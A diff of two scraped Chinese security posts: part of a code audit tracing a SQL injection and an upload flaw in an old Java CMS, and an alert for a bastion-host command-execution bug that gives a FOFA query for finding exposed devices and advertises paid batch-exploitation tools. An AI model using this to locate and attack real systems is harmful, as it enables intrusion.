![Pasted image 20250331211156.png](https://mmbiz.qpic.cn/sz_mmbiz_png/GzdTGmQpRic0DKKuMAu4bXMF7B2t6nk7VzREwbXaqL60e9MrqxuwQ5Tb1mu7cu41rGWXJeAXQw746bMb4ibXCQWg/640?wx_fmt=png&from=appmsg "")
![Pasted image 20250331211156.png](https://mmbiz.qpic.cn/sz_mmbiz_jpg/PDVoxXx6Rhic2eSUB7oxwhHPcGA4rxBibkxgEcnwkBFCibFOvQwRlLjRZJNyba0cAqkWz3kKf8mTf6V4LD0Iuy73Q/640?wx_fmt=jpeg "")
### 漏洞挖掘
sql注入成功
@ -64,7 +67,7 @@ sql注入成功
save方法接受了一个content对象为参数这个content对象包含主键contentId等信息formParam对象为一个新建的hashMap用于保存表单数据的键值对表示了一些扩展字段和其对应值那么在这个逻辑中如果contentId不为空则调用com.zhiliao.module.web.cms.service.ContentService#update更新数据否则调用com.zhiliao.module.web.cms.service.ContentService#save进行数据保存
![Pasted image 20250331052259.png](https://mmbiz.qpic.cn/sz_mmbiz_png/GzdTGmQpRic0DKKuMAu4bXMF7B2t6nk7Vmq3qM62ExCrsOXa6Jk86xUXT9KLFUQn5NiaPtnA2uxM2KbSfafkY9oA/640?wx_fmt=png&from=appmsg "")
![Pasted image 20250331052259.png](https://mmbiz.qpic.cn/sz_mmbiz_jpg/PDVoxXx6Rhic2eSUB7oxwhHPcGA4rxBibkMu7UuyqUeercRhJ3fykamHXPEpeiaVXE8PXjk1RpHxDFQaI3akfqQicA/640?wx_fmt=jpeg "")
@ -105,7 +108,7 @@ com.zhiliao.module.web.cms.service.impl.ContentServiceImpl#update(com.zhiliao.my
又调用了com.zhiliao.module.web.cms.service.impl.ContentServiceImpl#SaveModelFiledParam进行数据保存
![Pasted image 20250331052841.png](https://mmbiz.qpic.cn/sz_mmbiz_png/GzdTGmQpRic0DKKuMAu4bXMF7B2t6nk7V4e17rSVibS9q8FnQib2OPNy2lLoBlO3VITeOLwNnuEyciaQ8Zt1J1ShTg/640?wx_fmt=png&from=appmsg "")
![Pasted image 20250331052841.png](https://mmbiz.qpic.cn/sz_mmbiz_jpg/PDVoxXx6Rhic2eSUB7oxwhHPcGA4rxBibkicic97y1nX4UdZWbBVxGicibRIBF5Veysa4LUhTzibicgkBWMZgmycQjxviag/640?wx_fmt=jpeg "")
@ -188,7 +191,7 @@ com.zhiliao.module.web.cms.service.impl.ContentServiceImpl#update(com.zhiliao.my
那么这里执行的逻辑是首先进行非空判断接着遍历表单数据并且动态拼接到sql执行语句中最后进行执行显然这里是存在sql注入漏洞
![Pasted image 20250331053306.png](https://mmbiz.qpic.cn/sz_mmbiz_png/GzdTGmQpRic0DKKuMAu4bXMF7B2t6nk7VC5bFVev52loYCzYjbUnmSJCV2W2D654D2bUKqmuTFD5fFQKfjUhZeQ/640?wx_fmt=png&from=appmsg "")
![Pasted image 20250331053306.png](https://mmbiz.qpic.cn/sz_mmbiz_jpg/PDVoxXx6Rhic2eSUB7oxwhHPcGA4rxBibkDPPtMSl5we6icLZhRibLxvrnMr9iaBrS254FO13J0licFO4sVqics8HmI6Q/640?wx_fmt=jpeg "")
@ -258,14 +261,14 @@ com.zhiliao.common.upload.UploadComponent#uploadFile
这里的newName是从this.getNewFileName(fileName);得到的fileName又是通过this.getFileName(fileType) ;获得的:
![Pasted image 20250331054728.png](https://mmbiz.qpic.cn/sz_mmbiz_png/GzdTGmQpRic0DKKuMAu4bXMF7B2t6nk7VWXtwmS5rHWRjb1SGo1tc2NocPNRbqUNwicAzt27WuibRgwNr3EickMvWg/640?wx_fmt=png&from=appmsg "")
![Pasted image 20250331054728.png](https://mmbiz.qpic.cn/sz_mmbiz_jpg/PDVoxXx6Rhic2eSUB7oxwhHPcGA4rxBibk3pW7iaH7F804icoCEHdMBX5ia6USdKeTVh7QHAPnjhZX2PryIVPiaM5zIQ/640?wx_fmt=jpeg "")
最开始fileType又是通过this.getFileType(attachment.getOriginalFilename());获得的:
![Pasted image 20250331055057.png](https://mmbiz.qpic.cn/sz_mmbiz_png/GzdTGmQpRic0DKKuMAu4bXMF7B2t6nk7VpdjknrUaSuaZn9TYj3ibMO1I5GkSU6pMG9HmVf55Mpz7TPKZUc2Gouw/640?wx_fmt=png&from=appmsg "")
![Pasted image 20250331055057.png](https://mmbiz.qpic.cn/sz_mmbiz_jpg/PDVoxXx6Rhic2eSUB7oxwhHPcGA4rxBibkXia6DRP9ANyjic3gqXHcQKSFTqyapdV8JXx2F3YiaNYNpyVsP1farKibdw/640?wx_fmt=jpeg "")
@ -280,13 +283,14 @@ com.zhiliao.common.upload.UploadComponent#uploadFile
那么这里是使用了lastIndexof函数这样的话看上去后文件的类型是不可控的。
### 总结
### 这套源码是很老了,整体难度不大,非常适合新手进行学习。
## 2免费社区
安全洞察知识图谱星球是一个聚焦于信息安全对抗技术和企业安全建设的话题社区,也是一个
**[免费]**
的星球,欢迎大伙加入积极分享红蓝对抗、渗透测试、安全建设等热点主题
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/PDVoxXx6Rh8aia4mibs0I8I42MrYYOSE2DVEpVpPHvxufMGR0yufpgouwIXEl7H5eLm0MgolGFQMDFIrKLTxaYIQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/PDVoxXx6Rhic2eSUB7oxwhHPcGA4rxBibkzK2yZDWbEbIFUicsiaIvKBicJpoAGWD0TsCuglicbPcQsyKrmIibvHiaGWDA/640?wx_fmt=jpeg&from=appmsg "")

View File

@ -0,0 +1,68 @@
# 漏洞预警 上海上X信息技术股份有限公司 堡垒机 RepeatSend 命令执行漏洞
by 融云安全-cas 融云攻防实验室 2025-05-13 01:58
**0x01 阅读须知**
**融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!**
**0x02 漏洞描述(由于博主被经常被警告,厂商名不敢放出)**
上海上X信息技术股份有限公司堡垒机 
RepeatSend 命令执行漏洞学习。
![图片](https://mmbiz.qpic.cn/mmbiz_png/GWXBjgPE49w4eveLs9icicUqOQ30bzvyCtHdyS2cgEVJM3kicsVia3K7DdUtCeIhwicqC6BapX6MBb5UEwWMpzmXCVQ/640?wx_fmt=png&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1 "")
**0x03 漏洞复现**
**f****o****fa:body="default/getloginhtml"**
1.执行poc 进行命令执行,访问得到结果
![](https://mmbiz.qpic.cn/mmbiz_png/GWXBjgPE49xKicPTzjrTnfF8oYyhDcc1IdpZjzPrTMr6n7zVnPH2DiagYUCh0XEbbYEjqTnMy1g6uAwFMeyz6Lww/640?wx_fmt=png&from=appmsg "")
**2.代码审计过程和nuclei脚本发布在知识星球AI时代不会审计比原来更难拿到高薪。这位是七八年的审计经验大哥的代码审计星球。加入星球一起学习全年POC 0 day、代码审计技巧服务**
![](https://mmbiz.qpic.cn/mmbiz_png/GWXBjgPE49xKicPTzjrTnfF8oYyhDcc1ImXfTYXhDwibTqv1wk6IUEhhbicaxm5LoNoMql3tBTSlb6SGs44KT7eZA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/GWXBjgPE49xKicPTzjrTnfF8oYyhDcc1IIkUwJtUdWkce5ibNCCoAiaqTMIZwLanY3KYE0IiaWVicS3JW6vQLwnTsNg/640?wx_fmt=png&from=appmsg "")
**高质量漏洞利用研究,代码审计圈子等。**
**【圈子权益】**
**1一年至少200+漏洞Poc及对应漏洞批量利用工具**
**2各种漏洞利用工具及后续更新渗透工具、文档资源分享**
**星球目前在推广期价格为79元优惠30元后面恢复原价。**
![](https://mmbiz.qpic.cn/mmbiz_png/GWXBjgPE49xKicPTzjrTnfF8oYyhDcc1ITEfg8wqjLIicS2XeTVb9q8lpGbicVh9vT9V7lDUU5lgF3Kv62ciabVmQg/640?wx_fmt=png&from=appmsg "")
****
****
**0x05 公司简介**
江西渝融云安全科技有限公司2017年发展至今已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
   公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证拥有软件著作权十八项荣获2020年全国工控安全深度行安全攻防对抗赛三等奖庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......
****
**编制sm**
**审核fjh**
**审核Dog**
****
**1个1朵********5毛钱**
**天天搬砖的小M**
**能不能吃顿好的**
**就看你们的啦**
****